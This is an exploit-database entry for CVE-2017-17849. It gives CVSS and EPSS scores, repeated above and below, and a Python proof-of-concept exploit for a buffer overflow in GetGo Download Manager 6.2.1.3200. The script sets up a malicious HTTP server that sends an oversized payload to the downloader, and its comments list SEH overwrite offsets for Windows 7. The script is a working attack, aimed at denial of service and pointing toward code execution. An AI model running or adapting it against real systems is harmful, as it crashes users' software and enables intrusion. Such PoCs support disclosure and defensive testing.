10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.01 Low
EPSS
Percentile
83.6%
# Exploit Title: GetGo Download Manager 6.2.1.3200 - Buffer Overflow (Denial of Service)
# Date: 2018-07-25
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co
# CVE: CVE-2017-17849
# Tested On: Windows 7 x86, Windows 10 x64
#
# Details
#
# The downloader feature of GetGo Download Manager is vulnerable
# to a buffer overflow which can cause a denial of service.
# To test the proof of concept, have it executed in your machine
# and let the GetGo application download 'index.html' from your
# given IP.
#
# SEH details (Windows 7 x86):
#
# SEH chain of thread 00000644, item 1
# Address=0863E2C8
# SE handler=68463967 <-> 4108 offset
#
# SEH chain of thread 00000644, item 2
# Address=46386746 <-> 4104 offset
# SE handler=*** CORRUPT ENTRY ***
import socket
server_ip = "0.0.0.0"
server_port = 80
payload = "A" * 4104 + "BBBB" + "\xcc\xcc\xcc\xcc" + "D" * 11000 + "\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
print "Currently listening at " + server_ip + ":" + str(server_port)
client, (client_host, client_port) = sock.accept()
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
client.send(payload)
print "Sent payload"
client.close()
sock.close()
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.01 Low
EPSS
Percentile
83.6%